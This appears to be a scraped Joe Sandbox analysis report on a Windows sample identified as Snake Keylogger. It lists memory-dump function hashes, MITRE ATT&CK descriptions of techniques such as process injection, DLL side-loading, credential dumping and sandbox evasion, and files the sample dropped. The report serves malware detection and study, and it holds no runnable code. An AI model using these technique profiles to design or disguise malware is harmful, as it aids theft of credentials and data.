Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f9126c9b26c02e5aeceec83b1fb475db9a11ee3331bd63bea6aa63348055677
Instruction ID: cb318e5f1aaac203eff0077fb58628cb948f8a3e0d9c0ded3187ce4c62a13fbc
Opcode Fuzzy Hash: 0f9126c9b26c02e5aeceec83b1fb475db9a11ee3331bd63bea6aa63348055677
Instruction Fuzzy Hash: 892104757042548FDB16AF64E49476B3FA2FF84718F104469F9459F282CB38CC16DBA0

Function 050389A0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3766723869.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5030000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b3c2a313d56b5fbe04460198ac29b25ba9c85c0aa613e1a40e23456a4acf412
Instruction ID: 4598ceb35fa5569ca7398694c7f18d2715ffd5cdf5c33ff9c4de847700c023db
Opcode Fuzzy Hash: 0b3c2a313d56b5fbe04460198ac29b25ba9c85c0aa613e1a40e23456a4acf412
Instruction Fuzzy Hash: 53112B323042941FDB066F7CA8105AE3F97EFC9354B154469EA05DB392DE399D0783A1

Function 00E4D4C0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c68c1c794cbfc79f574a5bf0049b81236cfc75c7bed4ee5072f1904e2b5e95d1
Instruction ID: fb379ff37bab681d3c356a3b5d4dfc5619257b52cd497f33d4f83ec782b09350
Opcode Fuzzy Hash: c68c1c794cbfc79f574a5bf0049b81236cfc75c7bed4ee5072f1904e2b5e95d1
Instruction Fuzzy Hash: DA217F70D0124A9FDB06EFB9D94179EBFF1FB45304F0085AAD014EB369EB741A4A8B91

Function 00E45A70 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 031c8dbb38077ea079849a0a1944ff4414afca85c8bf848f1d557aae01f49ef2
Instruction ID: 50f362a4a4399501cace9d92f5d72f2a4306a622e47b49157afc4fde7fc92872
Opcode Fuzzy Hash: 031c8dbb38077ea079849a0a1944ff4414afca85c8bf848f1d557aae01f49ef2
Instruction Fuzzy Hash: C8112536700A228FC7199A29E89852EB7A6FFC47513154268E906DB351DF24DC0287D0

Function 00C8D3FF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3759684417.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_c8d000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
Instruction ID: 064b0b94e4ba71dcd30c9718b5d38c1ae9a25d905fad155ec762bdfeebabf1e5
Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
Instruction Fuzzy Hash: A3110372404280DFCB12DF00D5C4B16BF71FB94328F24C1A9E80A0B656C33AE95ACBA1

Function 00E41F61 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6df95db9621ad48c1a19f0aed9b94b224ce32c275989e379329580f112a19253
Instruction ID: 40ca5fd9942c83f20adebcaf988aa7daf790eb211755af20ee51ea70afb37cc3
Opcode Fuzzy Hash: 6df95db9621ad48c1a19f0aed9b94b224ce32c275989e379329580f112a19253
Instruction Fuzzy Hash: 1121E078C052598FCB41EFA8D8445EEBFF1BF49300F1051AAD809B7261EB341A95CBA1

Function 050384E8 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3766723869.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5030000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc64f2689f69cf9aa1073c1cb14d74f2238c11d400482b528cff55f56313cb48
Instruction ID: ff085e2c361336382991b0256f3580eeedb887ff585cc196855fc5b013aa3f83
Opcode Fuzzy Hash: fc64f2689f69cf9aa1073c1cb14d74f2238c11d400482b528cff55f56313cb48
Instruction Fuzzy Hash: AD1167B2800249DFDB10DF99D945BDEBFF8EF48320F148459EA18A7210C339A550CFA5

Function 00E4D4D0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1c666a4154a0375b63d635ecc467968008fb4938262b1a84f28a1d8638e826c
Instruction ID: dc85bbd6c61d6a6351dfa87491ed02433beaee31920f1151bae12263a2e9fcb2
Opcode Fuzzy Hash: a1c666a4154a0375b63d635ecc467968008fb4938262b1a84f28a1d8638e826c
Instruction Fuzzy Hash: 9B116A70D002099FCB45EFB9D94179EBBF2FB44304F0095AAD018AB369EB745A4A8B91

Function 05038C48 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3766723869.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5030000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 500f8df40d870af8f23f1acf84a6e6bab25a8e59dfbf2048654581ac240e4433
Instruction ID: f34fa0acd1ec56221ad2d76a56f57c0e3fc5daafb896be1202088902a244edec
Opcode Fuzzy Hash: 500f8df40d870af8f23f1acf84a6e6bab25a8e59dfbf2048654581ac240e4433
Instruction Fuzzy Hash: B71164B68002499FCB10CF99D945BDEBFF8EF48320F148459EA18A3210C339A551DFA1

Function 05038171 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3766723869.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5030000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a61f4b7dbc47b3d92f3a66153bc793523a61254ce25764db0abfe8e47ae82f5
Instruction ID: ddb5f51953f92eb38d56fe28944e8a848697b13301f69d360112c0965bd5f523
Opcode Fuzzy Hash: 1a61f4b7dbc47b3d92f3a66153bc793523a61254ce25764db0abfe8e47ae82f5
Instruction Fuzzy Hash: 85115234F011498FDB04DFE9E861BEEBBB9EF48314F04D0A1E908B7345E63099418B61

Function 00E41F08 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01b98e583dca048abdd62101ebf571b1fc6a14222b7deff217e47eca7f84c641
Instruction ID: f2ce7f73908e2ece2820221d60b177d3e75c2e1ce933422dbf1df57143d2d96e
Opcode Fuzzy Hash: 01b98e583dca048abdd62101ebf571b1fc6a14222b7deff217e47eca7f84c641
Instruction Fuzzy Hash: 06212478C017198FCB10EFA8D8485EEBFB1BF49310F10516AD405B72A4EB301A85CBA1

Function 00E45607 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c041c8cec3181f0ec8a2ab8015525a4183c6714254e9c32390862b6f62f041fe
Instruction ID: 0c64ebf239ff7c110281c4cacbc3b3b9d3bab2da679443ce24fec87dfc023817
Opcode Fuzzy Hash: c041c8cec3181f0ec8a2ab8015525a4183c6714254e9c32390862b6f62f041fe
Instruction Fuzzy Hash: D5012472B001246FDB059E64A800BFF3BE7DFC8751F19806AFA05DB291CE758C129790

Function 05032188 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3766723869.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5030000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a7f8968c17b6e01ff28aa9ff8ba1a31e70edb8e37e5592ffdd5a65ce17014ba
Instruction ID: 6166c5d5cb8b65b3eafec6e116a3cd969d8e270cab2616ecf10c6cedbb0de7b7
Opcode Fuzzy Hash: 0a7f8968c17b6e01ff28aa9ff8ba1a31e70edb8e37e5592ffdd5a65ce17014ba
Instruction Fuzzy Hash: 6401A475E0021AABCB44EFB9D9016AEBBF5BF48200F10856AD919F7254EB345901CB91

Function 05031CC0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3766723869.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5030000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 537575bb9aaddd27add06a1c102035c9da6f02253d8d0e380a1e5a2f3a8df171
Instruction ID: 9b9baeda40681c13bc77ae7caee812bf5b53663cc8edab5b624d68243c2f9c5e
Opcode Fuzzy Hash: 537575bb9aaddd27add06a1c102035c9da6f02253d8d0e380a1e5a2f3a8df171
Instruction Fuzzy Hash: EDF05431304A009FC744AB2AE85593A77EAAFC671171544BAF905CB261EA60DC01CBA1

Function 05031CD0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3766723869.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5030000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9f8fb8c9f7096b59bc0ca2a74209f466b16d0ecda25709fc18b252c31c9e9ed
Instruction ID: fd84e4da77c61757cf6ca3f4b5d75286deed9c1a9a61c88e37c0f45172e34c15
Opcode Fuzzy Hash: b9f8fb8c9f7096b59bc0ca2a74209f466b16d0ecda25709fc18b252c31c9e9ed
Instruction Fuzzy Hash: B5F08235300A109FD748AF2AF854A2A77EEEFC96117158479E506CB3A1DE30DC01C790

Function 00E42010 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99bbbf7efd110df8b17f9e1807933ec6b19e781cab77a0a6f397cb63f31cacb7
Instruction ID: 4830e9f39323b85f338e929a29a976a99ec3026efb5d8c29d3c689afeddc1ac8
Opcode Fuzzy Hash: 99bbbf7efd110df8b17f9e1807933ec6b19e781cab77a0a6f397cb63f31cacb7
Instruction Fuzzy Hash: 9BE09232C193AB5FCB03AB7498005EEFF34EE93210B8445D7D465AB042EB60295AC7A2

Function 00E42020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 167ca138bd54a72cb0621f607530b141a9e40a450550c5c4554824e77259018b
Instruction ID: 9881684e2ac1c203c46f0e201e92faa7cd433983539ecb409d52f3263c0f21e1
Opcode Fuzzy Hash: 167ca138bd54a72cb0621f607530b141a9e40a450550c5c4554824e77259018b
Instruction Fuzzy Hash: 84D05B31D2022B57CB00E7A5DC044EFF738EED5265B908626D55437140FB702659C7E1

Function 00E48258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 46e42d2d2737b89350f3c982f3d6078eae93e84a9855d21360853ecbf0fd135c
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 03C0123320C1282AA624108E7C40AABAB8CC2C17F8E250137F95CB3200A8829C8001A8

Function 00E4A70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e8a7cf0db6c42181d704d59a6dd2c750e060cee45dab42738b3c1c57cfa8432
Instruction ID: bd857a65114ceaa444be21c7ff135136aae45d7e9f79879255d074e1887fdcbd
Opcode Fuzzy Hash: 8e8a7cf0db6c42181d704d59a6dd2c750e060cee45dab42738b3c1c57cfa8432
Instruction Fuzzy Hash: 38D0677BB410189FCB049F9CE880CDDB7B6FB9C221B048516EA15A3261C6319921DB50

Function 00E45EA8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64524fca203e51e0ff0353d35c4aaa64a13b3d8c6da852f262dfae82e97e2b81
Instruction ID: e7e97dab027f24f5e5405e133d3a8d3c82bd4012a18ad3acd113485e43039f30
Opcode Fuzzy Hash: 64524fca203e51e0ff0353d35c4aaa64a13b3d8c6da852f262dfae82e97e2b81
Instruction Fuzzy Hash: 8CD02E745283860FD306F730EA462283B65FE81B08F9041E2B8040E02EEF7A0C4AC7A1

Function 00E4F014 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07db3bea67e916e28dfc3810b7b5f385d4ffe9702af95e5a2bdf33087fe75d3c
Instruction ID: 329d509469ac7e43714dbfa5388a833097da457161fe73f79ce86adcaf462ea8
Opcode Fuzzy Hash: 07db3bea67e916e28dfc3810b7b5f385d4ffe9702af95e5a2bdf33087fe75d3c
Instruction Fuzzy Hash: F3D04838D84228CBCF209F64EA482E8BBB0EB89301F1028A6D809B2250D7346E608F51

Function 00E45EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9db96a153734d71e2453d561e6c50fe0cd45b0cda33eea3afa9f4a9cea23a2a6
Instruction ID: a8399bfde98bdd1daa28662fed27a49796484cee8258115eee379fb94363c26a
Opcode Fuzzy Hash: 9db96a153734d71e2453d561e6c50fe0cd45b0cda33eea3afa9f4a9cea23a2a6
Instruction Fuzzy Hash: 31C0123056434A4BC609F775EA4661D375AF6C0704F405661B1091A12DDF79194987A4

Function 05031CA1 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3766723869.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_5030000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ae7e4c9baef2f8281502f457fec21c43356219ad063cf0de0c325bdd17a9bb4
Instruction ID: 3fd53748f0289e217953d3017baa874f4a38afb2eecbb0ec48c5a193fa383e2a
Opcode Fuzzy Hash: 0ae7e4c9baef2f8281502f457fec21c43356219ad063cf0de0c325bdd17a9bb4
Instruction Fuzzy Hash: CBC00238A403108FD744CB14E59475877A1B784321F25C665D405C7A61D72C9C52CB44

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rXcourOVPD.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25yirs4f.sbi.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3c2hmgtj.gwk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjvx4lpt.nya.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dilwc3vx.tkp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f4lqgljo.g10.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gh24tyzs.0bz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idzmky1i.3jk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3al0aqy.ppu.ps1

C:\Users\user\AppData\Local\Temp\tmp9DEF.tmp

Windows Analysis Report
file.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
